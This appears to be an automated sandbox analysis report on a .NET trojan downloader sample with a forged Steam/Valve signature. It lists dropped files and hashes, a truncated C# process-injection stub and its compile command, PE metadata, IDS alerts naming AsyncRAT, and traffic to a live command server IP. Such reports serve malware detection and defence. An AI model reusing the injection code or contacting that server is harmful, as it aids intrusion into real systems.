                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 73305 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                      Category:dropped
                      Size (bytes):73305
                      Entropy (8bit):7.996028107841645
                      Encrypted:true
                      SSDEEP:1536:krha8mqJ7v3CeFMz/akys7nSTK7QMuK+C/Oh5:kAOFq+Mba9Ok7C/O/
                      MD5:83142242E97B8953C386F988AA694E4A
                      SHA1:833ED12FC15B356136DCDD27C61A50F59C5C7D50
                      SHA-256:D72761E1A334A754CE8250E3AF7EA4BF25301040929FD88CF9E50B4A9197D755
                      SHA-512:BB6DA177BD16D163F377D9B4C63F6D535804137887684C113CC2F643CEAB4F34338C06B5A29213C23D375E95D22EF417EAC928822DFB3688CE9E2DE9D5242D10
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview:MSCF....Y.......,...................I.................;Za. .authroot.stl.98.?.6..CK..<Tk......4..c... .Ec...U.d.d.E&I.DH*..M.KB."..rK.RQ*..}f..f...}..1....9...........$.8q..fa...7.o.1.0...bfsM4.........u..l..0..4.a.t....0.....6#....n. :... ....%.,CQ5uU..(.3.<7#.0..JN.$...=j|w..*.#.oU..Eq[..P..^..~.V...;..m...I|...l..@-W..=.QQ.._./.M.nZ..(.........`.$Z.9wW:W.]..8*E.......I.D{..n...K:.m..^.(.S.......c..s.y..<...2.%o.o.....H.B.R.....11.|!.(...........h.SZ........<...^....Z>.Pp?... .pT@p.#.&..........#VEV=.....p........y..."T=l.n..egf.w..X.Y..-G...........KQ.]...pM..[m..-6.wd:........T...:.P5Zs....c.oT`..F1#......EuD.......7....V ..-....!.N..%S...k...S. ...@.J..../..b!B.(=\../.l......`.\...q9..>4!b..8EH.....zdy.....#...X>%0w...i.,>c.z.g"p.S..2W.+mMs.....5Def.....#._D.4....>}...i...\.&`D.......z;..ZY.3.+t.`....z_.q'w.z.)..j3.+.co.s..:.........qK...{...E....uPO...#vs.XxH.B!..(t. 8k+.....G\..?..GF8....'..w.>.ms..\ve.nFN..W)....xi..u..5.f.l....

                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):330
                      Entropy (8bit):3.2761979882874246
                      Encrypted:false
                      SSDEEP:6:kK/aImcQRnSN+SkQlPlEGYRMY9z+4KlDA3RUeqpGVuys1:aImfZkPlE99SNxAhUeq8S
                      MD5:A48776126BF3805BEC5C355C11462A16
                      SHA1:FC607A068DEA7C8CA582718937F15B1AACC925F5
                      SHA-256:EDF60C9617FD4E223D9FAF0E0BCFA570882D3C1732FE8AE62A70159ACEA7F62E
                      SHA-512:516EE5BB5D7A526C89960CD793881B067B4D9EC25EF4B710EB1D46FCC3E8E9C1D90B45C47FAF9175546A63B928E8B6835ED1E7932DF842E64A13AB25B27D8B8A
                      Malicious:false
                      Reputation:low
                      Preview:p...... ..........uC...(....................................................... ..................(....c*.....Y...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".6.4.2.7.f.6.c.2.b.7.8.7.d.b.1.:.0."...

                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.log

                      Download File
                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe
                      File Type:CSV text
                      Category:dropped
                      Size (bytes):847
                      Entropy (8bit):5.345615485833535
                      Encrypted:false
                      SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                      MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                      SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                      SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                      SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                      Malicious:true
                      Reputation:moderate, very likely benign file
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

                      C:\Users\user\AppData\Local\Temp\5dljncsi\5dljncsi.0.cs

                      Download File
                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe
                      File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):9122
                      Entropy (8bit):4.613031027327575
                      Encrypted:false
                      SSDEEP:96:JO1vYGpHKU5fZBDeXWuaLN0lWeCAaEjcqQDJ7iiLYkhxdP7NFa/COAoTOyt13IPw:AaGu7vpcfDFfckhxdP7NA/CxoSytSPf4
                      MD5:58B10EF6BA0DA88788F1AAC56CE7E2DB
                      SHA1:48221936B98AAC14EAD7C4589513D074365414EC
                      SHA-256:AE11144F426028E50E77D64A66AEB954E169F627F8ABFE403791032594834520
                      SHA-512:19C28B5AF8E4243350EE13C423FD066CEF969A5C86DE5F7B2AC4E4FBF75FDA17E82A6A91FBD6034786B9BEEE77E2EB4B1CECD1CF0B901E2874B88DA3E338845E
                      Malicious:true
                      Reputation:moderate, very likely benign file
                      Preview:.using System.Diagnostics;..using System.Runtime.InteropServices;..using System;....namespace Stub..{.. public static class Look.. {.. #region API delegate.. private delegate int ResumeThreadHandler(IntPtr handle);.. private delegate bool SetWowThreadContextHandler(IntPtr thread, int[] context);.. private delegate bool SetThreadContextHandler(IntPtr thread, int[] context);.. private delegate bool GetWowThreadContextHandler(IntPtr thread, int[] context);.. private delegate bool GetThreadContextHandler(IntPtr thread, int[] context);.. private delegate int VirtualAllocExHandler(IntPtr handle, int address, int length, int type, int protect);.. private delegate bool WriteMemoryHandler(IntPtr process, int baseAddress, byte[] buffer, int bufferSize, ref int bytesWritten);.. private delegate bool ReadMemoryHandler(IntPtr process, int baseAddress, ref int buffer, int bufferSize, ref int bytesRead);.. private delegate

                      C:\Users\user\AppData\Local\Temp\5dljncsi\5dljncsi.cmdline

                      Download File
                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe
                      File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                      Category:dropped
                      Size (bytes):204
                      Entropy (8bit):4.977468652770924
                      Encrypted:false
                      SSDEEP:6:pAu+H2L/6K2wkn23f8hC0zxszIwkn23f8hgn:p37L/6KRfU7QfUWn
                      MD5:46E9B619907978B2451C9AC7E6CA8833
                      SHA1:82D25E30FF35824F64A478AD368A05882C0582F4
                      SHA-256:9B16233109CF75DEA379FA2A416FABABF03160D8496B84B1C461912996CBECBF
                      SHA-512:F6BE4EE69947DB24A067684FCA03177A1B133048B95BD366E2CF13131E655F8CA0BCCC7FBF0333A171D4C9F7DD4D71A3BD7A9382AF6A25376509BBA550F2A91A
                      Malicious:true
                      Preview:./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\5dljncsi\5dljncsi.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\5dljncsi\5dljncsi.0.cs"

                      C:\Users\user\AppData\Local\Temp\5dljncsi\5dljncsi.dll

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):8704
                      Entropy (8bit):4.524290500803184
                      Encrypted:false
                      SSDEEP:192:PxhVsIlJlHlHlHlHldlglfbflnldICNuBaZMg5MqkexP:51lJlHlHlHlHldlglfbflnlDABK5MqHN
                      MD5:664C3682494BFE8492DBCA8D5D998CFE
                      SHA1:716200A2F7DA84790E794A5049032411F15A2E88
                      SHA-256:4FF8AE4C384A6E8E0038309B05A6A02D89A66414769A62B1FA11EB8380AAC054
                      SHA-512:7795ED9913E55BF113BF7D50A7B6B1F5DB2D805AFAABAFD4D4525D112FAFA932F2386D94D51AEF859051891C3C48289AC8733B86D43590A44B5F14D1263672C4
                      Malicious:true
                      Antivirus:
                      • Antivirus: Avira, Detection: 100%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........!.................8... ...@....... ....................................@..................................8..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................8......H........$...............................................................0..m.................r...p...r...p...r...p...r9..p...re..p...r...p...r...p...r...p...r...p....r...p....r=..p....rg..p..*...(......(.........(....(.........*....0............8.............................(....(....(....}....~.....~....~....~..... ....~.........o,...-.s....z..<(..........4X(...... .............. .....(.....3.~......{......o....-!s....z~......{......o....-.s....z...)......~......{.......X..

                      C:\Users\user\AppData\Local\Temp\5dljncsi\5dljncsi.out

                      Download File
                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe
                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                      Category:modified
                      Size (bytes):702
                      Entropy (8bit):5.222805864311501
                      Encrypted:false
                      SSDEEP:12:KJN/qR37L/6KRfU7QfUWuKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBqdn6KRfPfMKax5DqBVKVrdFAMBJTH
                      MD5:EC635EE3019D4C9FBEB91A046E606D8E
                      SHA1:B7E98EE5C27C204A9FE525D6103C6EB3F0927236
                      SHA-256:FB83C015E708089F409A12D2F29B8388D40B88CEC24B25CCCF3530CEE9EECF9F
                      SHA-512:1569631A9265F33AFD6A377460C9B0C3A33F3DFB5555B7630159FA85DE536DE69F5183181087B490AF868909BD3E250E64577C18F80C7F7710C4BB1354A7EAF3
                      Malicious:false
                      Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\5dljncsi\5dljncsi.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\5dljncsi\5dljncsi.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                      C:\Users\user\AppData\Local\Temp\5dljncsi\CSC46F1B711EF3E491E90EFFC96C5EAD74.TMP

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                      File Type:MSVC .res
                      Category:dropped
                      Size (bytes):652
                      Entropy (8bit):3.0872114866851375
                      Encrypted:false
                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryefak7YnqqbYPN5Dlq5J:+RI+ycuZhNAfakSbYPNnqX
                      MD5:0ABB82EB267B06C6353191EC5757A13E
                      SHA1:49BB1AD0D630567BDA75B002E7CDD28C700DBCCC
                      SHA-256:F6438515945890864B4EC0838324EA525D858B6A61AE725BF645538459BC5C60
                      SHA-512:487A8405E337E33BA73CB68B3DF3A92469F1E44C85490D140C4805FB7F36608F3F91BA9A64C8E44D03FEE862F82F5E8B794C6678045FEFB46C011E36CA2F907B
                      Malicious:false
                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...5.d.l.j.n.c.s.i...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...5.d.l.j.n.c.s.i...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                      C:\Users\user\AppData\Local\Temp\RES8956.tmp

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Sat Apr 12 19:31:52 2025, 1st section name ".debug$S"
                      Category:dropped
                      Size (bytes):1328
                      Entropy (8bit):3.9777127892340025
                      Encrypted:false
                      SSDEEP:24:HSe9EuZfCgb5XDfHdPwKEbsmfII+ycuZhNAfakSbYPNnqSqd:vBZ5z9YKPmg1ulwa3MqSK
                      MD5:0FCB25D21D34FBE93158BBEB6911DE4F
                      SHA1:863568A0BC81A0ACA5CF9B843DBF8FCA70D041C8
                      SHA-256:02F93ADF1A666A9EEF442456460FD5F5A7C3040DB15C47B0B9369734CE955D8C
                      SHA-512:2C45E4AC0D9798CAB1D538D4B83BEFE18D9FDB5C17CE19878CB5E338B0ACEC97301419FB799A14DC5F3F787077452DC8A6570A010C2F95F4556FF86BE443B212
                      Malicious:false
                      Preview:L......g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\5dljncsi\CSC46F1B711EF3E491E90EFFC96C5EAD74.TMP....................&{..51..WW.>..........4.......C:\Users\user\AppData\Local\Temp\RES8956.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...5.d.l.j.n.c.s.i...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Entropy (8bit):5.4454330816358265
                      TrID:
                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      • Win32 Executable (generic) a (10002005/4) 49.97%
                      • Generic Win/DOS Executable (2004/3) 0.01%
                      • DOS Executable Generic (2002/1) 0.01%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe
                      File size:472'480 bytes
                      MD5:9308044d486d7b3f5ffee3f41d3f7881
                      SHA1:ee98fb3fb0b2f5e0a1e05fc409b920363626a8ca
                      SHA256:a4846d7540225062d89a5bb08fdc3ed947e0ca684507a5f21bfe7d71bbcc2dd3
                      SHA512:5386698177d70809b88f7147a7597b14f81a0bbada85437d1a71e3db7bb2f5b566b64839c63d8d53b95041ad0e65f96257c3a7ce1fb31bc3f31f89415a918644
                      SSDEEP:6144:CLgtRLl3jFbiumDh4Su7XjnEyL8h+uACdWfdoxn67CQQdzS5gaMC2eY:CLSLl3pdm92QIloxnMcYrMBeY
                      TLSH:84A4C070B74A5ED6E88D8E31D6BE77B8F62A78695E448313B38872029D5104DECCC7C9
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....\............"...0......n........... ........@.. ...............................S....`................................

                      File Icon

                      Icon Hash:0f184a1325e78e07

                      Static PE Info

                      General

                      Entrypoint:0x46c7fe
                      Entrypoint Section:.text
                      Digitally signed:true
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Time Stamp:0x9CAA5CAD [Wed Apr 16 10:02:21 2053 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                      Authenticode Signature

                      Signature Valid:false
                      Signature Issuer:C=CN, L=SH, O=SHA384, OU=RSA4096, CN=Steam
                      Signature Validation Error:A certificate chain could not be built to a trusted root authority
                      Error Number:-2146762486
                      Not Before, Not After
                      • 01/07/2024 16:05:00 10/04/2035 16:05:00
                      Subject Chain
                      • CN=Valve
                      Version:3
                      Thumbprint MD5:CC6D00A97A7A3385A5284B19800589F2
                      Thumbprint SHA-1:4FE0825C966DE1074434E85A4A2618A1F2F90AA7
                      Thumbprint SHA-256:0ED2753CE85567C075007E9D652C0FE693611445F01717357B1C8B7C89B8F602
                      Serial:00AB6902D0ABC4DD7B23775A00E09AD1C133B96731

                      Entrypoint Preview

                      Instruction
                      jmp dword ptr [00402000h]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x6c7a80x53.text
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x6e0000x6a3c.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x71a000x1ba0.rsrc
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x760000xc.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x20000x6a8040x6aa00839754131f66c3234aff2d6db9e67955False0.3954929293669402data5.327374763664784IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rsrc0x6e0000x6a3c0x6c00719ac4b1e8bb8c6d31a9cb241e64e228False0.5030381944444444data5.411733160080582IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc0x760000xc0x20021e52a72e063ee78150091e61758d8b7False0.041015625data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      RT_ICON0x6e2b00x668Device independent bitmap graphic, 48 x 96 x 4, image size 00.3176829268292683
                      RT_ICON0x6e9180x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 00.45564516129032256
                      RT_ICON0x6ec000x128Device independent bitmap graphic, 16 x 32 x 4, image size 00.6891891891891891
                      RT_ICON0x6ed280xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.5852878464818764
                      RT_ICON0x6fbd00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.7527075812274369
                      RT_ICON0x704780x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5924855491329479
                      RT_ICON0x709e00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.43558091286307055
                      RT_ICON0x72f880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.5884146341463414
                      RT_ICON0x740300x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.7393617021276596
                      RT_GROUP_ICON0x744980x84data0.5984848484848485
                      RT_VERSION0x7451c0x334data0.4268292682926829
                      RT_MANIFEST0x748500x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                      Imports

                      DLLImport
                      mscoree.dll_CorExeMain

                      Version Infos

                      DescriptionData
                      Translation0x0000 0x04b0
                      CommentsCpFull
                      CompanyNameCpFull
                      FileDescriptionCpFull
                      FileVersion7.8.1.6
                      InternalNameStub.exe
                      LegalCopyrightCopyright CpFull 2025
                      LegalTrademarksCpFull
                      OriginalFilenameStub.exe
                      ProductNameCpFull
                      ProductVersion7.8.1.6
                      Assembly Version5.9.1.8

                      Network Behavior

                      Suricata IDS Alerts

                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                      2025-04-12T19:35:14.891255+02002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.44971377.223.119.8580TCP
                      2025-04-12T19:35:20.984647+02002842478ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)177.223.119.851414192.168.2.449714TCP

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Apr 12, 2025 19:35:10.672291040 CEST4968180192.168.2.42.17.190.73
                      Apr 12, 2025 19:35:14.436136007 CEST4971380192.168.2.477.223.119.85
                      Apr 12, 2025 19:35:14.662534952 CEST804971377.223.119.85192.168.2.4
                      Apr 12, 2025 19:35:14.662616014 CEST4971380192.168.2.477.223.119.85
                      Apr 12, 2025 19:35:14.663721085 CEST4971380192.168.2.477.223.119.85
                      Apr 12, 2025 19:35:14.891134024 CEST804971377.223.119.85192.168.2.4
                      Apr 12, 2025 19:35:14.891154051 CEST804971377.223.119.85192.168.2.4
                      Apr 12, 2025 19:35:14.891164064 CEST804971377.223.119.85192.168.2.4
                      Apr 12, 2025 19:35:14.891170025 CEST804971377.223.119.85192.168.2.4
                      Apr 12, 2025 19:35:14.891176939 CEST804971377.223.119.85192.168.2.4
                      Apr 12, 2025 19:35:14.891187906 CEST804971377.223.119.85192.168.2.4
                      Apr 12, 2025 19:35:14.891192913 CEST804971377.223.119.85192.168.2.4
                      Apr 12, 2025 19:35:14.891199112 CEST804971377.223.119.85192.168.2.4
                      Apr 12, 2025 19:35:14.891210079 CEST804971377.223.119.85192.168.2.4
                      Apr 12, 2025 19:35:14.891222000 CEST804971377.223.119.85192.168.2.4
                      Apr 12, 2025 19:35:14.891254902 CEST4971380192.168.2.477.223.119.85
                      Apr 12, 2025 19:35:14.891298056 CEST4971380192.168.2.477.223.119.85
                      Apr 12, 2025 19:35:15.118050098 CEST804971377.223.119.85192.168.2.4
                      Apr 12, 2025 19:35:15.118069887 CEST804971377.223.119.85192.168.2.4
                      Apr 12, 2025 19:35:15.118079901 CEST804971377.223.119.85192.168.2.4
                      Apr 12, 2025 19:35:15.118086100 CEST804971377.223.119.85192.168.2.4
                      Apr 12, 2025 19:35:15.118092060 CEST804971377.223.119.85192.168.2.4
                      Apr 12, 2025 19:35:15.118098021 CEST804971377.223.119.85192.168.2.4
                      Apr 12, 2025 19:35:15.118107080 CEST804971377.223.119.85192.168.2.4
                      Apr 12, 2025 19:35:15.118112087 CEST804971377.223.119.85192.168.2.4
                      Apr 12, 2025 19:35:15.118118048 CEST804971377.223.119.85192.168.2.4
                      Apr 12, 2025 19:35:15.118124962 CEST804971377.223.119.85192.168.2.4
                      Apr 12, 2025 19:35:15.118135929 CEST804971377.223.119.85192.168.2.4
                      Apr 12, 2025 19:35:15.118145943 CEST804971377.223.119.85192.168.2.4
                      Apr 12, 2025 19:35:15.118151903 CEST804971377.223.119.85192.168.2.4
                      Apr 12, 2025 19:35:15.118160009 CEST804971377.223.119.85192.168.2.4
                      Apr 12, 2025 19:35:15.118165970 CEST804971377.223.119.85192.168.2.4
                      Apr 12, 2025 19:35:15.118171930 CEST804971377.223.119.85192.168.2.4
                      Apr 12, 2025 19:35:15.118177891 CEST804971377.223.119.85192.168.2.4
                      Apr 12, 2025 19:35:15.118182898 CEST804971377.223.119.85192.168.2.4
                      Apr 12, 2025 19:35:15.118189096 CEST804971377.223.119.85192.168.2.4
                      Apr 12, 2025 19:35:15.118195057 CEST804971377.223.119.85192.168.2.4
                      Apr 12, 2025 19:35:15.118444920 CEST4971380192.168.2.477.223.119.85
                      Apr 12, 2025 19:35:15.118444920 CEST4971380192.168.2.477.223.119.85
                      Apr 12, 2025 19:35:15.118444920 CEST4971380192.168.2.477.223.119.85
                      Apr 12, 2025 19:35:15.347357035 CEST804971377.223.119.85192.168.2.4
                      Apr 12, 2025 19:35:15.347378016 CEST804971377.223.119.85192.168.2.4
                      Apr 12, 2025 19:35:15.347388029 CEST804971377.223.119.85192.168.2.4
                      Apr 12, 2025 19:35:15.347399950 CEST804971377.223.119.85192.168.2.4
                      Apr 12, 2025 19:35:15.347409964 CEST804971377.223.119.85192.168.2.4
                      Apr 12, 2025 19:35:15.347428083 CEST804971377.223.119.85192.168.2.4
                      Apr 12, 2025 19:35:15.347440004 CEST804971377.223.119.85192.168.2.4
                      Apr 12, 2025 19:35:15.347450972 CEST804971377.223.119.85192.168.2.4
